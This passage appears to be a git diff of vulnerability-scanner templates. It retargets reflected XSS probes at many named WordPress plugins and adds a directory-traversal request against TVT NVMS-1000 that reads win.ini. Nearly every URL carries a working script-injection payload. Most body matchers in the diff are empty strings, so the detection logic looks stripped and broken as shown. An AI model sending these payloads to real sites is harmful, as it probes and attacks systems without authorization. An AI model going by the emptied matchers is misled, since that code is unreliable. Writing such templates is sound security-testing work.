'{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2019-16332.yaml b/CVE-2019-16332.yaml index f067dd1..7a1a0b7 100644 --- a/CVE-2019-16332.yaml +++ b/CVE-2019-16332.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2019-16525.yaml b/CVE-2019-16525.yaml new file mode 100755 index 0000000..c2ccc90 --- /dev/null +++ b/CVE-2019-16525.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-19134.yaml b/CVE-2019-19134.yaml index 5aeed95..89c923f 100644 --- a/CVE-2019-19134.yaml +++ b/CVE-2019-19134.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'foo">' + - 'foo">' part: body - type: word diff --git a/CVE-2019-20085.yaml b/CVE-2019-20085.yaml new file mode 100755 index 0000000..1c31973 --- /dev/null +++ b/CVE-2019-20085.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 diff --git a/CVE-2020-12054.yaml b/CVE-2020-12054.yaml index e937c8a..60bcb22 100644 --- a/CVE-2020-12054.yaml +++ b/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header @@ -27,4 +29,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/CVE-2020-17362.yaml b/CVE-2020-17362.yaml index 2e265da..f448fae 100644 --- a/CVE-2020-17362.yaml +++ b/CVE-2020-17362.yaml @@ -11,13 +11,18 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" + part: body + + - type: word + words: + - "nova-lite" part: body - type: word diff --git a/CVE-2021-24298.yaml b/CVE-2021-24298.yaml index b57d43a..40b4fa6 100644 --- a/CVE-2021-24298.yaml +++ b/CVE-2021-24298.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2021-24320.yaml b/CVE-2021-24320.yaml index 42d9616..27ed4e2 100644 --- a/CVE-2021-24320.yaml +++ b/CVE-2021-24320.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2021-24335.yaml b/CVE-2021-24335.yaml index ea7b581..960dfbe 100644 --- a/CVE-2021-24335.yaml +++ b/CVE-2021-24335.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2021-24389.yaml b/CVE-2021-24389.yaml index e8b37ed..3b6b1bb 100644 --- a/CVE-2021-24389.yaml +++ b/CVE-2021-24389.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-church-admin-xss.yaml b/wp-church-admin-xss.yaml index 1b5fa99..f5c5957 100644 --- a/wp-church-admin-xss.yaml +++ b/wp-church-admin-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-custom-tables-xss.yaml b/wp-custom-tables-xss.yaml index d29132c..c0918d7 100644 --- a/wp-custom-tables-xss.yaml +++ b/wp-custom-tables-xss.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-finder-xss.yaml b/wp-finder-xss.yaml index c2141ac..1bbd462 100644 --- a/wp-finder-xss.yaml +++ b/wp-finder-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-flagem-xss.yaml b/wp-flagem-xss.yaml index bcd78b1..90505bc 100644 --- a/wp-flagem-xss.yaml +++ b/wp-flagem-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-knews-xss.yaml b/wp-knews-xss.yaml index 198ba8e..9b0815e 100644 --- a/wp-knews-xss.yaml +++ b/wp-knews-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E ' + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-nextgen-xss.yaml b/wp-nextgen-xss.yaml index 30f3806..e4b63e6 100644 --- a/wp-nextgen-xss.yaml +++ b/wp-nextgen-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-phpfreechat-xss.yaml b/wp-phpfreechat-xss.yaml index 986f908..c908448 100644 --- a/wp-phpfreechat-xss.yaml +++ b/wp-phpfreechat-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-slideshow-xss.yaml b/wp-slideshow-xss.yaml index 41649c2..61a03ab 100644 --- a/wp-slideshow-xss.yaml +++ b/wp-slideshow-xss.yaml @@ -10,16 +10,16 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/wp-socialfit-xss.yaml b/wp-socialfit-xss.yaml index 50082d8..3da8d47 100644 --- a/wp-socialfit-xss.yaml +++ b/wp-socialfit-xss.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '' + - '' - type: word part: header words: